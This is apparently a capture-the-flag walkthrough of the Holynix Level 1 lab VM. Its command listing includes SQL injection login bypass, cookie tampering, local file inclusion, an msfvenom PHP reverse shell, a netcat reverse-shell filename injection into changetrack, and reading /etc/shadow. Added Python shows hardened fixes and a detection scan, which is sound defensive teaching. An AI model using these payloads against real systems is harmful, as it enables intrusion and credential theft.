Back on the internal message board, the attacker discovers that "changetrack" is installed, configured to back up a certain folder, and scheduled to run every five minutes. A service like this is usually executed with the highest level of privileges; otherwise it could not back up everything. The attacker checks whether the user they are using, alamo, has access to the folder being monitored; it turns out only two users do (one of which is alamo!).
The attacker then checks a local copy of a public exploit database, exploitdb, to see whether there are any known exploits for this service. There is only one result, which reveals that the service doesn't escape certain filenames; a crafted filename can therefore cause the service to execute shell commands. The attacker notes the example filename that is given, but instead of using a "bind" connection as in the example, they choose to reverse it. Locally, the attacker sets up another listener, and on the target checks for, and configures, netcat, a program that can attach a shell to a network connection so that commands are read from and executed over it. The attacker flips the direction of netcat so that the target establishes the connection and the attacker simply waits for it, rather than having to keep checking whether a listening port has appeared.
The attacker now waits for the changetrack service to be triggered, which shouldn't take long, as the message board hinted: it backs up every five minutes...
...A little while later, the attacker notices that the remote system has executed their command and opened a remote shell with the privileges of the superuser account, root.
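The weakness behind this escalation, as the walkthrough describes it, is a backup job that runs as root every five minutes and pastes filenames from a user-writable folder straight into the shell commands it executes. The Python below is an added illustration, not code from the original post or from changetrack itself: it puts that unsafe pattern next to two hardened forms (an argv list with no shell, and shlex.quote when a shell string is unavoidable) and adds the check a defender can run over such a folder, flagging names that contain shell metacharacters. The function names, the constructed folder, and the harmless echo used in place of the walkthrough's netcat filename are assumptions of the example.

```python
import os
import shlex
import subprocess
import tempfile

# Characters that change the meaning of a command line when a filename is
# pasted into it unquoted: command substitution, separators, redirection,
# globbing, quoting, history expansion, and plain word splitting on spaces.
SHELL_META = set("`$|;&<>(){}*?!\"'\\\n ")

# Stand-in for the privileged backup action. Printing each argument on its
# own line shows exactly what a real cp/tar/rsync would have received.
JOB = "printf '%s\\n'"


def unsafe_command(path):
    """Vulnerable pattern: the filename is concatenated into a shell string."""
    return JOB + " " + path


def safe_command(path):
    """Hardened string form: every untrusted argument goes through shlex.quote."""
    return JOB + " " + shlex.quote(path)


def safe_argv(path):
    """Best form: an argv list run without a shell, so the name is one argument."""
    return ["printf", "%s\\n", path]


def run(cmd):
    """Run a shell string (via sh -c) or an argv list; return stdout lines."""
    if isinstance(cmd, str):
        proc = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True)
    else:
        proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.stdout.splitlines()


def is_shell_injectable(name):
    """True if a privileged job must never interpolate this name unquoted."""
    return any(ch in SHELL_META for ch in name)


def scan_directory(directory):
    """Names in `directory` that would alter a shell command built by concatenation."""
    return sorted(n for n in os.listdir(directory) if is_shell_injectable(n))


def demo():
    # Constructed sample: a monitored folder with two ordinary files and one
    # crafted name in the style of the walkthrough (a harmless echo stands in
    # for the netcat command the original filename carries).
    folder = tempfile.mkdtemp()
    crafted = "notes;echo INJECTED"
    for name in ("report.txt", "diagram.png", crafted):
        open(os.path.join(folder, name), "w").close()
    path = os.path.join(folder, crafted)
    return {
        "flagged": scan_directory(folder),
        "unsafe": run(unsafe_command(path)),    # name is split; the echo runs
        "safe_str": run(safe_command(path)),    # one argument, nothing else runs
        "safe_argv": run(safe_argv(path)),      # same result, no shell involved
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The argv form is the real fix: the name reaches the program as a single argument and no shell ever parses it. The scan is a compensating control for jobs you cannot change, such as a cron entry that runs vendor scripts; run before the privileged job, or from a file-integrity monitor, it turns a crafted filename into an alert rather than a root shell.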
Code:
# Host discovery and port scanning
nmap 192.168.0.0/24 -sn -n
us -H -msf -Iv 192.168.0.11 -p 1-65535 && us -H -mU -Iv 192.168.0.11 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.11

# Web login bypassed with SQL injection in the password field
firefox 192.168.0.11 &
# Username: g0tmi1k Password: ' OR 1=1 # id: alamo
Right click -> View Page Info -> Headers
Firefox -> Directory
curl -s 192.168.0.11
curl -s --cookie "uid=1" 192.168.0.11

# Harvest usernames from the employee directory
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/ / \n/g; s/example.net/example.net\n/g" | grep example.net | sed "firstname.lastname@example.org//"
curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/ / \n/g; s/example.net/example.net\n/g" | grep example.net | sed "email@example.com//" > /tmp/users
wc -l /tmp/users

# Map uid cookie values to account names
for x in $(seq 1 64); do
  y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1)
  if [ $y ] ; then echo $x=$y ; fi
done

# Local file inclusion through the text_file_name parameter
Firefox -> Tools -> Tamper Data -> Start Tamper
firefox http://192.168.0.11/?page=ssp.php # Display File
Tamper -> text_file_name: ssp.php
http://192.168.0.11//index.php?page=ssp.php&text_file_name=/etc/passwd
cat /tmp/users | sed 's/^/~/' >> /tmp/users
cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u http://192.168.0.11 # /tmp/users.txt

# PHP payload uploaded as etenenbaum by changing the uid cookie, then included
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg
Firefox -> Tools -> Tamper Data -> Start Tamper
firefox # Upload (fails)
Tamper -> Cookie: uid=2 # id: etenenbaum
firefox # Upload again
firefox http://192.168.0.11/~etenenbaum/ # evil.jpg
firefox http://192.168.0.11/?page=ssp.php # Display File
Tamper -> text_file_name: /home/etenenbaum/evil.jpg
http://192.168.0.11//index.php?page=ssp.php&text_file_name=upload.php
http://192.168.0.11//index.php?page=ssp.php&text_file_name=transfer.php
cd /tmp
mv evil.jpg evil.php
chmod +x evil.php
ls -l evil.php
tar -cvzf evil.tar.gz evil.php
ls -l evil*
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E
firefox http://192.168.0.11/~etenenbaum/

# Meterpreter session: database credentials and the knockknock profile
sysinfo
shell
id
pwd
ls -lah
cd /var/apache2
ls -lah
cat config.inc
python -c 'import pty; pty.spawn("/bin/sh")'
mysql -u root -pmY5qLr007p@S5w0rD
SHOW DATABASES;
USE creds;
SHOW TABLES;
SELECT * FROM accounts;
quit
firefox http://192.168.0.11/index?page=messageboard.php # knockknock
wget http://192.168.0.11/misc/knockknock-0.7.tar.gz
tar zxvf knockknock-0.7.tar.gz
cd knockknock-0.7
head -n 20 INSTALL
python setup.py install
cd /etc/knockknock.d/profiles/
ls -lAh
cp -r alamo ~/knockknock
exit
exit
exit
exit

# Port knocking from the attacker's machine, then SSH
wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/
mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11
ls -lAh
#cat config
nmap -p 22 -T5 -v 192.168.0.11
#python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && nmap -p 13820 -T5 -v 192.168.0.11
python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && ssh firstname.lastname@example.org # Ih@cK3dM1cR05oF7
id
# sudo -l

# Privilege escalation via changetrack's unescaped filenames
firefox http://192.168.0.11/index?page=messageboard.php # Changetrack
cd /pentest/exploits/exploitdb
grep -i changetrack files.csv
cat platforms/linux/local/9709.txt
ls -lah /home # development is set to nobody & developers
cat /etc/group | grep developers # Alamo jljohansen
cd /home/development
ls -lAh
whereis nc
nc -lvp 443
touch "<\`nc 192.168.0.192 443 -e \$SHELL\`"
ls
watch -d -n 1 "netstat -ant" # wait 5 mins
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh /root/
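The uid cookie that the listing above tampers with (uid=1 to browse, then uid=2 to upload as etenenbaum) shows that the application's session identifier is nothing more than a user number the client can edit. The Python below is an added illustration, not code from the original post or from the Holynix application: it places that pattern beside a hardened one in which the server issues an HMAC-signed token and rejects any cookie whose signature does not verify. The SECRET key, the user table, and the function names are constructed for the example; only the two account names come from the walkthrough.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated at start-up here for the example.
SECRET = secrets.token_bytes(32)

# Constructed user table; the two names appear in the walkthrough.
USERS = {1: "alamo", 2: "etenenbaum"}


def user_from_plain_cookie(cookie):
    """Vulnerable pattern: the cookie is just 'uid=<n>' and the number is
    trusted, so any client becomes any user by editing it (uid=1 -> uid=2)."""
    if not cookie.startswith("uid="):
        return None
    try:
        uid = int(cookie[4:])
    except ValueError:
        return None
    return USERS.get(uid)


def _sign(payload):
    """MAC over the payload with a key only the server holds."""
    return hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(uid):
    """Hardened pattern: the server binds the uid to a signature it alone can compute."""
    payload = f"uid={uid}"
    return payload + "." + _sign(payload)


def user_from_signed_cookie(cookie):
    """Accept the uid only if the signature over it verifies (constant-time compare)."""
    payload, sep, sig = cookie.rpartition(".")
    if not sep:
        return None
    if not hmac.compare_digest(_sign(payload).encode(), sig.encode()):
        return None
    return user_from_plain_cookie(payload)


def tamper(cookie, new_uid):
    """What Tamper Data does in the walkthrough: rewrite the uid, keep the rest."""
    payload, sep, sig = cookie.rpartition(".")
    return f"uid={new_uid}" + (sep + sig if sep else "")


if __name__ == "__main__":
    print("plain, tampered:", user_from_plain_cookie(tamper("uid=1", 2)))
    token = issue_session(1)
    print("signed, genuine:", user_from_signed_cookie(token))
    print("signed, tampered:", user_from_signed_cookie(tamper(token, 2)))
```

A production session token would also carry an expiry and be a random, server-side-looked-up value rather than a signed uid, but the point the walkthrough makes survives either way: the server, not the browser, has to be the authority on which account a cookie belongs to, and every cookie field the client can rewrite must be treated as attacker input.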
- When starting the VM for the first time with VMware, select "Moved It"; otherwise it could cause issues (e.g. the target will not be visible!).
- There is possibly another method of gaining access; different tools (e.g. Burp Suite instead of Tamper Data) or techniques (modifying the SQL injection, or permanently editing the cookie value) could also be used to achieve the same effect.
- Some mistakes in the video are more obvious.
- On reflection, a few commands should have been issued to verify the comments on the message board, such as "ls /etc | grep -i changetrack" and "cat /etc/changetrack.conf".
Song: Hometown Glory (High Contrast Remix) - Adele & One Love- The Prodigy & Ill Behaviour - Danny Byrd
Video length: 12:55
Capture length: 55:21
Blog Post: g0tmi1k: [Video] Holynix - Level 1
Forum Post: http://www.backtrack-linux.org/forum...-videos/43880-[video]-holynix-level-1-a.html#post204837